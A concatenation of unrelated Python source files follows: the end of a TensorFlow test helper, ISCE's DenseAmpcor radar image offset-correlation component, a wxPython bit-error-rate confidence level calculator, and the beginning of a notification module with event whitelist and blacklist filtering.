TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `Device` object.
device2: A string device name or TensorFlow `Device` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
|
DenseAmpcor.py
|
#! /usr/bin/env python
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2014 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: Brent Minchew
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
from __future__ import print_function
import sys
import os
import math
import isceobj
from isceobj.Location.Offset import OffsetField,Offset
from iscesys.Component.Component import Component,Port
from iscesys.Compatibility import Compatibility
Compatibility.checkPythonVersion()
from iscesys.StdOEL.StdOELPy import create_writer
from .Ampcor import Ampcor
from isceobj.Util.mathModule import is_power2
import logging
import numpy as np
import multiprocessing as mp
from iscesys.ImageUtil.ImageUtil import ImageUtil as IU
from isceobj.Util.decorators import use_api
def getThreadCount():
'''
Return number of threads available.
'''
cpus = os.cpu_count()
try:
ompnum = int(os.environ['OMP_NUM_THREADS'])
except KeyError:
ompnum = None
if ompnum is None:
return cpus
else:
return ompnum
def intround(n):
if (n <= 0):
return int(n-0.5)
else:
return int(n+0.5)
logger = logging.getLogger('mroipac.ampcor.denseampcor')
WINDOW_SIZE_WIDTH = Component.Parameter('windowSizeWidth',
public_name='WINDOW_SIZE_WIDTH',
default = 64,
type = int,
mandatory = False,
doc = 'Width of the reference data window to be used for correlation')
WINDOW_SIZE_HEIGHT = Component.Parameter('windowSizeHeight',
public_name='WINDOW_SIZE_HEIGHT',
default = 64,
type = int,
mandatory = False,
doc = 'Height of the reference data window to be used for correlation')
SEARCH_WINDOW_SIZE_WIDTH = Component.Parameter('searchWindowSizeWidth',
public_name='SEARCH_WINDOW_SIZE_WIDTH',
default = 100,
type = int,
mandatory = False,
doc = 'Width of the search data window to be used for correlation')
SEARCH_WINDOW_SIZE_HEIGHT = Component.Parameter('searchWindowSizeHeight',
public_name='SEARCH_WINDOW_SIZE_HEIGHT',
default = 100,
type = int,
mandatory = False,
doc = 'Height of the search data window to be used for correlation')
ZOOM_WINDOW_SIZE = Component.Parameter('zoomWindowSize',
public_name = 'ZOOM_WINDOW_SIZE',
default = 16,
type = int,
mandatory = False,
doc = 'Zoom window around the local maximum for first pass')
OVERSAMPLING_FACTOR = Component.Parameter('oversamplingFactor',
public_name = 'OVERSAMPLING_FACTOR',
default = 16,
type = int,
mandatory = False,
doc = 'Oversampling factor for the FFTs to get sub-pixel shift.')
ACROSS_GROSS_OFFSET = Component.Parameter('acrossGrossOffset',
public_name = 'ACROSS_GROSS_OFFSET',
default = None,
type = int,
mandatory = False,
doc = 'Gross offset in the range direction.')
DOWN_GROSS_OFFSET = Component.Parameter('downGrossOffset',
public_name = 'DOWN_GROSS_OFFSET',
default = None,
type = int,
mandatory = False,
doc = 'Gross offset in the azimuth direction.')
ACROSS_LOOKS = Component.Parameter('acrossLooks',
public_name = 'ACROSS_LOOKS',
default = 1,
type = int,
mandatory = False,
doc = 'Number of looks to take in range before correlation')
DOWN_LOOKS = Component.Parameter('downLooks',
public_name = 'DOWN_LOOKS',
default = 1,
type = int,
mandatory = False,
doc = 'Number of looks to take in azimuth before correlation')
SKIP_SAMPLE_ACROSS = Component.Parameter('skipSampleAcross',
public_name = 'SKIP_SAMPLE_ACROSS',
default = None,
type = int,
mandatory = False,
doc = 'Number of samples to skip in range direction')
SKIP_SAMPLE_DOWN = Component.Parameter('skipSampleDown',
public_name = 'SKIP_SAMPLE_DOWN',
default = None,
type = int,
mandatory = False,
doc = 'Number of windows in azimuth direction')
DOWN_SPACING_PRF1 = Component.Parameter('prf1',
public_name = 'DOWN_SPACING_PRF1',
default = 1.0,
type = float,
mandatory = False,
doc = 'PRF or a similar scale factor for azimuth spacing of reference image.')
DOWN_SPACING_PRF2 = Component.Parameter('prf2',
public_name = 'DOWN_SPACING_PRF2',
default = 1.0,
type = float,
mandatory = False,
doc = 'PRF or a similar scale factor for azimuth spacing of search image.')
ACROSS_SPACING1 = Component.Parameter('rangeSpacing1',
public_name = 'ACROSS_SPACING1',
default = 1.0,
type = float,
mandatory = False,
doc = 'Range pixel spacing or similar scale factor for reference image.')
ACROSS_SPACING2 = Component.Parameter('rangeSpacing2',
public_name = 'ACROSS_SPACING2',
default = 1.0,
type = float,
mandatory = False,
doc = 'Range pixel spacing or similar scale for search image.')
IMAGE_DATATYPE1 = Component.Parameter('imageDataType1',
public_name = 'IMAGE_DATATYPE1',
default='',
type = str,
mandatory = False,
doc = 'Image data type for reference image (complex / real/ mag)')
IMAGE_DATATYPE2 = Component.Parameter('imageDataType2',
public_name = 'IMAGE_DATATYPE2',
default='',
type = str,
mandatory=False,
doc = 'Image data type for search image (complex / real/ mag)')
IMAGE_SCALING_FACTOR = Component.Parameter('scaling_factor',
public_name = 'IMAGE_SCALING_FACTOR',
default = 1.0,
type = float,
mandatory=False,
doc = 'Image data scaling factor (unit magnitude conversion from pixels)')
SNR_THRESHOLD = Component.Parameter('thresholdSNR',
public_name = 'SNR_THRESHOLD',
default = 0.0,
type = float,
mandatory=False,
doc = 'SNR threshold for valid matches.')
COV_THRESHOLD = Component.Parameter('thresholdCov',
public_name = 'COV_THRESHOLD',
default = 1000.0,
type = float,
mandatory=False,
doc = 'Covariance threshold for valid matches.')
BAND1 = Component.Parameter('band1',
public_name='BAND1',
default=0,
type = int,
mandatory = False,
doc = 'Band number of image1')
BAND2 = Component.Parameter('band2',
public_name='BAND2',
default=0,
type=int,
mandatory=False,
doc = 'Band number of image2')
OFFSET_IMAGE_NAME = Component.Parameter('offsetImageName',
public_name='OFFSET_IMAGE_NAME',
default='dense_ampcor.bil',
type=str,
mandatory=False,
doc = 'File name for two channel output')
SNR_IMAGE_NAME = Component.Parameter('snrImageName',
public_name = 'SNR_IMAGE_NAME',
default = 'dense_ampcor_snr.bil',
type=str,
mandatory=False,
doc = 'File name for output SNR')
MARGIN = Component.Parameter('margin',
public_name = 'MARGIN',
default = 50,
type = int,
mandatory=False,
doc = 'Margin around the edge of the image to avoid')
NUMBER_THREADS = Component.Parameter('numberThreads',
public_name = 'NUMBER_THREADS',
default=getThreadCount(),
type=int,
mandatory=False,
doc = 'Number of parallel ampcor threads to launch')
class DenseAmpcor(Component):
family = 'denseampcor'
logging_name = 'isce.mroipac.denseampcor'
parameter_list = (WINDOW_SIZE_WIDTH,
WINDOW_SIZE_HEIGHT,
SEARCH_WINDOW_SIZE_WIDTH,
SEARCH_WINDOW_SIZE_HEIGHT,
ZOOM_WINDOW_SIZE,
OVERSAMPLING_FACTOR,
ACROSS_GROSS_OFFSET,
DOWN_GROSS_OFFSET,
ACROSS_LOOKS,
DOWN_LOOKS,
SKIP_SAMPLE_ACROSS,
SKIP_SAMPLE_DOWN,
DOWN_SPACING_PRF1,
DOWN_SPACING_PRF2,
ACROSS_SPACING1,
ACROSS_SPACING2,
IMAGE_DATATYPE1,
IMAGE_DATATYPE2,
IMAGE_SCALING_FACTOR,
SNR_THRESHOLD,
COV_THRESHOLD,
BAND1,
BAND2,
OFFSET_IMAGE_NAME,
SNR_IMAGE_NAME,
MARGIN,
NUMBER_THREADS)
@use_api
def denseampcor(self,slcImage1 = None,slcImage2 = None):
if not (slcImage1 == None):
self.slcImage1 = slcImage1
if (self.slcImage1 == None):
logger.error("Error. master slc image not set.")
raise Exception
if not (slcImage2 == None):
self.slcImage2 = slcImage2
if (self.slcImage2 == None):
logger.error("Error. slave slc image not set.")
raise Exception
self.fileLength1 = self.slcImage1.getLength()
self.lineLength1 = self.slcImage1.getWidth()
self.fileLength2 = self.slcImage2.getLength()
self.lineLength2 = self.slcImage2.getWidth()
####Run checks
self.checkTypes()
self.checkWindows()
####Actual processing
coarseAcross = self.acrossGrossOffset
coarseDown = self.downGrossOffset
xMargin = 2*self.searchWindowSizeWidth + self.windowSizeWidth
yMargin = 2*self.searchWindowSizeHeight + self.windowSizeHeight
#####Set image limits for search
offAc = max(self.margin,-coarseAcross)+xMargin
if offAc % self.skipSampleAcross != 0:
leftlim = offAc
offAc = self.skipSampleAcross*(1 + int(offAc/self.skipSampleAcross)) - self.pixLocOffAc
while offAc < leftlim:
offAc += self.skipSampleAcross
offDn = max(self.margin,-coarseDown)+yMargin
if offDn % self.skipSampleDown != 0:
toplim = offDn
offDn = self.skipSampleDown*(1 + int(offDn/self.skipSampleDown)) - self.pixLocOffDn
while offDn < toplim:
offDn += self.skipSampleDown
offAcmax = int(coarseAcross + ((self.rangeSpacing1/self.rangeSpacing2)-1)*self.lineLength1)
lastAc = int(min(self.lineLength1, self.lineLength2-offAcmax) - xMargin -1 - self.margin)
offDnmax = int(coarseDown + ((self.prf2/self.prf1)-1)*self.fileLength1)
lastDn = int(min(self.fileLength1, self.fileLength2-offDnmax) - yMargin -1 - self.margin)
self.gridLocAcross = range(offAc + self.pixLocOffAc, lastAc - self.pixLocOffAc, self.skipSampleAcross)
self.gridLocDown = range(offDn + self.pixLocOffDn, lastDn - self.pixLocOffDn, self.skipSampleDown)
startAc, endAc = offAc, self.gridLocAcross[-1] - self.pixLocOffAc
self.numLocationAcross = int((endAc-startAc)/self.skipSampleAcross + 1)
self.numLocationDown = len(self.gridLocDown)
self.offsetCols, self.offsetLines = self.numLocationAcross, self.numLocationDown
print('Pixels: ', self.lineLength1, self.lineLength2)
print('Lines: ', self.fileLength1, self.fileLength2)
print('Wins : ', self.windowSizeWidth, self.windowSizeHeight)
print('Srch: ', self.searchWindowSizeWidth, self.searchWindowSizeHeight)
#####Create shared memory objects
numlen = self.numLocationAcross * self.numLocationDown
self.locationDown = np.frombuffer(mp.Array('i', numlen).get_obj(), dtype='i')
self.locationDownOffset = np.frombuffer(mp.Array('f', numlen).get_obj(), dtype='f')
self.locationAcross = np.frombuffer(mp.Array('i', numlen).get_obj(), dtype='i')
self.locationAcrossOffset = np.frombuffer(mp.Array('f', numlen).get_obj(), dtype='f')
self.snr = np.frombuffer(mp.Array('f', numlen).get_obj(), dtype='f')
self.locationDownOffset[:] = -10000.0
self.locationAcrossOffset[:] = -10000.0
self.snr[:] = 0.0
###run ampcor on parallel processes
threads = []
nominal_load = self.numLocationDown // self.numberThreads
flat_indices = np.arange(numlen).reshape((self.numLocationDown,self.numLocationAcross))
ofmt = 'Thread %d: %7d%7d%7d%7d%7d%7d'
for thrd in range(self.numberThreads):
# Determine location down grid indices for thread
if thrd == self.numberThreads - 1:
proc_num_grid = self.numLocationDown - thrd * nominal_load
else:
proc_num_grid = nominal_load
istart = thrd * nominal_load
iend = istart + proc_num_grid
# Compute corresponding global line/down indices
proc_loc_down = self.gridLocDown[istart:iend]
startDown, endDown = proc_loc_down[0], proc_loc_down[-1]
numDown = int((endDown - startDown)//self.skipSampleDown + 1)
# Get flattened grid indices
firstind = flat_indices[istart:iend,:].ravel()[0]
lastind = flat_indices[istart:iend,:].ravel()[-1]
print(ofmt % (thrd, firstind, lastind, startAc, endAc, startDown, endDown))
# Launch job
args = (startAc,endAc,startDown,endDown,self.numLocationAcross,
numDown,firstind,lastind)
threads.append(mp.Process(target=self._run_ampcor, args=args))
threads[-1].start()
# Wait for all threads to finish
for thread in threads:
thread.join()
self.firstSampAc, self.firstSampDown = self.locationAcross[0], self.locationDown[0]
self.lastSampAc, self.lastSampDown = self.locationAcross[-1], self.locationDown[-1]
#### Scale images (default is 1.0 to keep as pixel)
self.locationDownOffset *= self.scaling_factor
self.locationAcrossOffset *= self.scaling_factor
self.snr *= self.scaling_factor
self.write_slantrange_images()
def _run_ampcor(self, firstAc, lastAc, firstDn, lastDn,
numAc, numDn, firstind, lastind):
'''
Individual calls to ampcor.
'''
os.environ['VRT_SHARED_SOURCE'] = "0"
objAmpcor = Ampcor()
objAmpcor.setWindowSizeWidth(self.windowSizeWidth)
objAmpcor.setWindowSizeHeight(self.windowSizeHeight)
objAmpcor.setSearchWindowSizeWidth(self.searchWindowSizeWidth)
objAmpcor.setSearchWindowSizeHeight(self.searchWindowSizeHeight)
objAmpcor.setImageDataType1(self.imageDataType1)
objAmpcor.setImageDataType2(self.imageDataType2)
objAmpcor.setFirstSampleAcross(firstAc)
objAmpcor.setLastSampleAcross(lastAc)
objAmpcor.setNumberLocationAcross(numAc)
objAmpcor.setFirstSampleDown(firstDn)
objAmpcor.setLastSampleDown(lastDn)
objAmpcor.setNumberLocationDown(numDn)
objAmpcor.setAcrossGrossOffset(self.acrossGrossOffset)
objAmpcor.setDownGrossOffset(self.downGrossOffset)
objAmpcor.setFirstPRF(self.prf1)
objAmpcor.setSecondPRF(self.prf2)
objAmpcor.setFirstRangeSpacing(self.rangeSpacing1)
objAmpcor.setSecondRangeSpacing(self.rangeSpacing2)
objAmpcor.thresholdSNR = 1.0e-6
objAmpcor.thresholdCov = self.thresholdCov
objAmpcor.oversamplingFactor = self.oversamplingFactor
mSlc = isceobj.createImage()
IU.copyAttributes(self.slcImage1, mSlc)
mSlc.setAccessMode('read')
mSlc.createImage()
sSlc = isceobj.createImage()
IU.copyAttributes(self.slcImage2, sSlc)
sSlc.setAccessMode('read')
sSlc.createImage()
objAmpcor.ampcor(mSlc, sSlc)
mSlc.finalizeImage()
sSlc.finalizeImage()
j = 0
length = len(objAmpcor.locationDown)
for i in range(lastind-firstind):
acInd = firstAc + self.pixLocOffAc + (i % numAc)*self.skipSampleAcross
downInd = firstDn + self.pixLocOffDn + (i//numAc)*self.skipSampleDown
if j < length and objAmpcor.locationDown[j] == downInd and objAmpcor.locationAcross[j] == acInd:
self.locationDown[firstind+i] = objAmpcor.locationDown[j]
self.locationDownOffset[firstind+i] = objAmpcor.locationDownOffset[j]
self.locationAcross[firstind+i] = objAmpcor.locationAcross[j]
self.locationAcrossOffset[firstind+i] = objAmpcor.locationAcrossOffset[j]
self.snr[firstind+i] = objAmpcor.snrRet[j]
j += 1
else:
self.locationDown[firstind+i] = downInd
self.locationDownOffset[firstind+i] = -10000.
self.locationAcross[firstind+i] = acInd
self.locationAcrossOffset[firstind+i] = -10000.
self.snr[firstind+i] = 0.
return
def write_slantrange_images(self):
'''Write output images'''
####Snsure everything is 2D image first
if self.locationDownOffset.ndim == 1:
self.locationDownOffset = self.locationDownOffset.reshape(-1,self.offsetCols)
if self.locationAcrossOffset.ndim == 1:
self.locationAcrossOffset = self.locationAcrossOffset.reshape(-1,self.offsetCols)
if self.snr.ndim == 1:
self.snr = self.snr.reshape(-1,self.offsetCols)
if self.locationDown.ndim == 1:
self.locationDown = self.locationDown.reshape(-1,self.offsetCols)
if self.locationAcross.ndim == 1:
self.locationAcross = self.locationAcross.reshape(-1,self.offsetCols)
outdata = np.empty((2*self.offsetLines, self.offsetCols), dtype=np.float32)
outdata[::2,:] = self.locationDownOffset
outdata[1::2,:] = self.locationAcrossOffset
outdata.tofile(self.offsetImageName)
del outdata
outImg = isceobj.createImage()
outImg.setDataType('FLOAT')
outImg.setFilename(self.offsetImageName)
outImg.setBands(2)
outImg.scheme = 'BIL'
outImg.setWidth(self.offsetCols)
outImg.setLength(self.offsetLines)
outImg.setAccessMode('read')
outImg.renderHdr()
####Create SNR image
self.snr.astype(np.float32).tofile(self.snrImageName)
snrImg = isceobj.createImage()
snrImg.setFilename(self.snrImageName)
snrImg.setDataType('FLOAT')
snrImg.setBands(1)
snrImg.setWidth(self.offsetCols)
snrImg.setLength(self.offsetLines)
snrImg.setAccessMode('read')
snrImg.renderHdr()
def checkTypes(self):
'''Check if the image datatypes are set.'''
if self.imageDataType1 == '':
if self.slcImage1.getDataType().upper().startswith('C'):
self.imageDataType1 = 'complex'
else:
raise ValueError('Undefined value for imageDataType1. Should be complex/real/mag')
else:
if self.imageDataType1 not in ('complex','real','mag'):
raise ValueError('ImageDataType1 should be either complex/real/rmg1/rmg2.')
if self.imageDataType2 == '':
if self.slcImage2.getDataType().upper().startswith('C'):
self.imageDataType2 = 'complex'
else:
raise ValueError('Undefined value for imageDataType2. Should be complex/real/mag')
else:
if self.imageDataType2 not in ('complex','real','mag'):
raise ValueError('ImageDataType1 should be either complex/real/mag.')
def checkWindows(self):
'''Ensure that the window sizes are valid for the code to work.'''
if (self.windowSizeWidth%2 == 1):
raise ValueError('Window size width needs to be an even number.')
if (self.windowSizeHeight%2 == 1):
raise ValueError('Window size height needs to be an even number.')
if not is_power2(self.zoomWindowSize):
raise ValueError('Zoom window size needs to be a power of 2.')
if not is_power2(self.oversamplingFactor):
raise ValueError('Oversampling factor needs to be a power of 2.')
if self.searchWindowSizeWidth >= 2*self.windowSizeWidth :
raise ValueError('Search Window Size Width should be < 2 * Window Size Width')
if self.searchWindowSizeHeight >= 2*self.windowSizeHeight :
raise ValueError('Search Window Size Height should be < 2 * Window Size Height')
if self.zoomWindowSize >= min(self.searchWindowSizeWidth, self.searchWindowSizeHeight):
raise ValueError('Zoom window size should be <= Search window size')
if self._stdWriter is None:
self._stdWriter = create_writer("log", "", True, filename="denseampcor.log")
self.pixLocOffAc = self.windowSizeWidth//2 + self.searchWindowSizeWidth - 1
self.pixLocOffDn = self.windowSizeHeight//2 + self.searchWindowSizeHeight - 1
def setImageDataType1(self, var):
self.imageDataType1 = str(var)
return
def setImageDataType2(self, var):
self.imageDataType2 = str(var)
return
def setImageScalingFactor(self, var):
self.scaling_factor = float(var)
return
def setLineLength1(self,var):
self.lineLength1 = int(var)
return
def setLineLength2(self, var):
self.LineLength2 = int(var)
return
def setFileLength1(self,var):
self.fileLength1 = int(var)
return
def setFileLength2(self, var):
self.fileLength2 = int(var)
def setSkipSampleAcross(self,var):
self.skipSampleAcross = int(var)
return
def setSkipSampleDown(self,var):
self.skipSampleDown = int(var)
return
def setAcrossGrossOffset(self,var):
self.acrossGrossOffset = int(var)
return
def setDownGrossOffset(self,var):
self.downGrossOffset = int(var)
return
def setFirstPRF(self,var):
self.prf1 = float(var)
return
def setSecondPRF(self,var):
self.prf2 = float(var)
return
def setFirstRangeSpacing(self,var):
self.rangeSpacing1 = float(var)
return
def setSecondRangeSpacing(self,var):
self.rangeSpacing2 = float(var)
def setMasterSlcImage(self,im):
self.slcImage1 = im
return
def setSlaveSlcImage(self,im):
self.slcImage2 = im
return
def setWindowSizeWidth(self, var):
temp = int(var)
if (temp%2 == 1):
raise ValueError('Window width needs to be an even number.')
self.windowSizeWidth = temp
return
def setWindowSizeHeight(self, var):
temp = int(var)
if (temp%2 == 1):
raise ValueError('Window height needs to be an even number.')
self.windowSizeHeight = temp
return
def setZoomWindowSize(self, var):
temp = int(var)
if not is_power2(temp):
raise ValueError('Zoom window size needs to be a power of 2.')
self.zoomWindowSize = temp
def setOversamplingFactor(self, var):
temp = int(var)
if not is_power2(temp):
raise ValueError('Oversampling factor needs to be a power of 2.')
self.oversamplingFactor = temp
def setSearchWindowSizeWidth(self, var):
self.searchWindowSizeWidth = int(var)
return
def setSearchWindowSizeHeight(self, var):
self.searchWindowSizeHeight = int(var)
return
def setAcrossLooks(self, var):
self.acrossLooks = int(var)
return
def setDownLooks(self, var):
self.downLooks = int(var)
return
def stdWriter(self, var):
self._stdWriter = var
return
def __init__(self, name=''):
super(DenseAmpcor, self).__init__(family=self.__class__.family, name=name)
self.locationAcross = []
self.locationAcrossOffset = []
self.locationDown = []
self.locationDownOffset = []
self.snrRet = []
self.cov1Ret = []
self.cov2Ret = []
self.cov3Ret = []
self.lineLength1 = None
self.lineLength2 = None
self.fileLength1 = None
self.fileLength2 = None
self.scaleFactorX = None
self.scaleFactorY = None
self.firstSampAc = None
self.lastSampAc = None
self.firstSampDown = None
self.lastSampDown = None
self.numLocationAcross = None
self.numLocationDown = None
self.offsetCols = None
self.offsetLines = None
self.gridLocAcross = None
self.gridLocDown = None
self.pixLocOffAc = None
self.pixLocOffDn = None
self._stdWriter = None
self.offsetLines = None
self.offsetCols = None
self.dictionaryOfVariables = { \
'IMAGETYPE1' : ['imageDataType1', 'str', 'optional'], \
'IMAGETYPE2' : ['imageDataType2', 'str', 'optional'], \
'IMAGE_SCALING_FACTOR' : ['scaling_factor', 'float', 'optional'], \
'SKIP_SAMPLE_ACROSS' : ['skipSampleAcross', 'int','mandatory'], \
'SKIP_SAMPLE_DOWN' : ['skipSampleDown', 'int','mandatory'], \
'COARSE_NUMBER_LOCATION_ACROSS' : ['coarseNumWinAcross','int','mandatory'], \
'COARSE_NUMBER_LOCATION_DOWN' : ['coarseNumWinDown', 'int', 'mandatory'], \
'ACROSS_GROSS_OFFSET' : ['acrossGrossOffset', 'int','optional'], \
'DOWN_GROSS_OFFSET' : ['downGrossOffset', 'int','optional'], \
'PRF1' : ['prf1', 'float','optional'], \
'PRF2' : ['prf2', 'float','optional'], \
'RANGE_SPACING1' : ['rangeSpacing1', 'float', 'optional'], \
'RANGE_SPACING2' : ['rangeSpacing2', 'float', 'optional'], \
}
self.dictionaryOfOutputVariables = {
'FIRST_SAMPLE_ACROSS' : 'firstSampAc',
'FIRST_SAMPLE_DOWN' : 'firstSampDn',
'NUMBER_LINES': 'offsetLines',
'NUMBER_PIXELS' : 'offsetCols'}
return None
#end class
if __name__ == "__main__":
sys.exit(main())
|
BER_confidence_level_calculator_v0p2.py
|
#!python3
# -*- coding: utf-8 -*-
"""
@author: yanbin
Any suggestion? Please contract yanbin_c@hotmail.com
"""
import os
import wx
import sys
import time,datetime
import numpy as np
import math
from time import clock
from threading import Thread
from wx.lib.embeddedimage import PyEmbeddedImage
class MyFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self,None,-1,'BER Confidence Level Calculator V0.2',size=(600,400))
nb_main=wx.Notebook(self,-1,pos=(0,0),size=(600,400),style=wx.BK_DEFAULT)
self.panel_c=panel_Calculator(nb_main,-1)
self.panel_v=panel_version(nb_main,-1)
nb_main.AddPage(self.panel_c,"BER Cal")
nb_main.AddPage(self.panel_v,"Version")
self.panel_c.btn_run.Bind(wx.EVT_BUTTON,self.On_Run)
def On_Run(self, event):
thread = Thread(target = self.On_Run_cal, args = (), name = self.On_Run_cal.__name__)
thread.start()
def On_Run_cal(self):
basic_setting=self.panel_c.get_setting()
bers=float(basic_setting["BER"])
bps=float(basic_setting["BPS"])
t=float(basic_setting["T"])
error=int(basic_setting["E"])
unit_list=(1,60,3600)
unit=unit_list[int(basic_setting["U"]) ]
p=0
N=bps*unit*t
for i in range (error+1):
p+=math.pow(N*bers,i)/math.factorial(i)
Pnk=math.exp(-N*bers)*p
CL=1-Pnk
self.panel_c.txt_N.SetValue (str(N))
self.panel_c.txt_CL.SetValue (str(CL*100))
print ('\n\n\t***Simulation Done.***')
return()
class panel_Calculator(wx.Panel):
def __init__(self,*args,**kwargs):
wx.Panel.__init__(self,*args,**kwargs)
self.sizer=wx.GridBagSizer(hgap=10,vgap=5)
self.sizer.Add(wx.StaticText(self,-1,r'BER Confidence Level Calculator'),pos=(0,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.sizer.Add(wx.StaticText(self,-1,r'Specified BER (BERs)'),pos=(1,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_ber=wx.TextCtrl(self,-1,"1e-16",size=(50,-1))
self.sizer.Add(self.txt_ber,pos=(1,1),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
self.sizer.Add(wx.StaticText(self,-1,r'Datarate in bits per second(BPS)'),pos=(2,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_bps=wx.TextCtrl(self,-1,"4.8e9",size=(50,-1))
self.sizer.Add(self.txt_bps,pos=(2,1),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
self.sizer.Add(wx.StaticText(self,-1,r'Numbers of measured bit errors(E)'),pos=(3,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_error=wx.TextCtrl(self,-1,"0",size=(50,-1))
self.sizer.Add(self.txt_error,pos=(3,1),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
self.sizer.Add(wx.StaticText(self,-1,r'Measurement time(T)'),pos=(4,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_time=wx.TextCtrl(self,-1,"2000",size=(50,-1))
self.sizer.Add(self.txt_time,pos=(4,1),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
self.sizer.Add(wx.StaticText(self,-1,r'in units of:'),pos=(4,2),flag=wx.ALIGN_CENTER_VERTICAL)
sampleList = ['Seconds', 'Minutes', 'Hours']
self.u_choice = wx.ComboBox(self,-1,'Hours',(740,18),(80,20),sampleList, wx.CB_DROPDOWN)
self.sizer.Add(self.u_choice,pos=(4,3),flag=wx.ALIGN_CENTER_VERTICAL)
self.btn_run = wx.Button(self, 20, "Calculate", (20, 100))
self.btn_run.SetToolTip("Run Analysis...")
self.sizer.Add(self.btn_run,pos=(5,0),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL)
self.sizer.Add(wx.StaticText(self,-1,r'Numbers of transmitted bits(N=BPS*T)'),pos=(6,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_N=wx.TextCtrl(self,-1,"",size=(100,-1))
self.sizer.Add(self.txt_N,pos=(6,1),span=(1,2),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
self.sizer.Add(wx.StaticText(self,-1,r'BER confidence level(CL*100%)'),pos=(7,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_CL=wx.TextCtrl(self,-1,"",size=(100,-1))
self.sizer.Add(self.txt_CL,pos=(7,1),span=(1,2),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
jpg_file = wx.Image('eqn_ber_cl.jpg', wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.sizer.Add(wx.StaticBitmap(self, -1, jpg_file, (10 + jpg_file.GetWidth(), 5), (jpg_file.GetWidth(), jpg_file.GetHeight())),pos=(8,0),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
self.SetSizer(self.sizer)
self.sizer.Add(wx.StaticText(self,-1,r'Reference: JitterLabs website of "BER Confidence-level Calculator".'),pos=(9,0),span=(1,4))
self.sizer.Add(wx.StaticText(self,-1,r'Link: https://www.jitterlabs.com/support/calculators/ber-confidence-level-calculator'),pos=(10,0),span=(1,4))
def get_setting(self):
res={}
res["BER"]=self.txt_ber.GetValue()
res["BPS"]=self.txt_bps.GetValue()
res["T"]=self.txt_time.GetValue()
res["U"]=self.u_choice.GetSelection ()
res["E"]=self.txt_error.GetValue()
return res
class panel_version(wx.Panel):
def __init__(self,*args,**kwargs):
wx.Panel.__init__(self,*args,**kwargs)
self.sizer=wx.GridBagSizer(hgap=10,vgap=5)
self.sizer.Add(wx.StaticText(self,-1,'version 0.1:Initial Release'),pos=(0,0))
self.sizer.Add(wx.StaticText(self,-1,'yanbin_c@hotmail.com'),pos=(1,0))
self.SetSizer(self.sizer)
self.sizer.Fit(self)
self.Fit
if __name__ == "__main__":
app = wx.App()
frame=MyFrame()
frame.Show()
app.MainLoop()
|
notification.py
|
#!/usr/bin/env python3
import logging
import re
import smtplib
import time
from abc import ABC
from email.message import EmailMessage
from threading import Thread
from typing import List, Dict
import pymsteams
import validators
from mf import BRAND
from mf.utils import EnvironmentVariableFetcher
class SendEventDecider:
"""
Makes decision on whether or not a Notification should be sent.
Takes a whitelist and a blacklist. The following rules are applied:
- Blacklisted events are never sent
- If whitelist is not empty, ONLY events in whitelist sent
- If whitelist and blacklist are both empty, events are sent
"""
_whitelist: List[str] = None
_blacklist: List[str] = None
def __init__(self, whitelist: List[str], blacklist: List[str]):
self._whitelist = whitelist
self._blacklist = blacklist
def should_send(self, event_name: str):
if event_name in self._blacklist:
logging.getLogger('root').debug("{}: Event “{}” would be sent but it is blacklisted.".format(
self.__class__.__name__, event_name
))
return False
if len(self._whitelist) > 0 and event_name not in self._whitelist:
logging.getLogger('root').debug("{}: Event “{}” would be sent but it is not whitelisted.".format(
self.__class__.__name__, event_name
))
return False
return True
class CanNotify(ABC):
""" Interface for classes that can notify """
def get_name(self):
pass
def notify(self, event: str, message: str):
pass
class NotifierBag:
